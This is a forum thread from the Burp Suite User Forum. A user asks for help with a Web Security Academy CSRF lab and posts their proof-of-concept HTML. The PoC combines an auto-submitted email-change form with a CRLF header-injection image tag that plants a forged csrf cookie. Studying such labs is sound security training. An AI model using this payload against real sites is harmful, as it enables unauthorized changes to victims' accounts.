The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Cannot solve lab "CSRF where token is duplicated in cookie"

HieuNgTe | Last updated: Jan 05, 2024 04:50PM UTC

I cannot solve lab "CSRF where token is duplicated in cookie" This is my CSRF POC: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a310063031c4c6282ee29fc0064006f.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" /> <input type="hidden" name="csrf" value="csrftest" /> <input type="submit" value="Submit request" /> </form> <img src="https://0a310063031c4c6282ee29fc0064006f.web-security-academy.net/?search=test%0d%0aSet-Cookie:csrf=csrftest%3b%20SameSite=None" onerror="document.forms[0].submit();"/> </body> </html>

Ben, PortSwigger Agent | Last updated: Jan 08, 2024 11:26AM UTC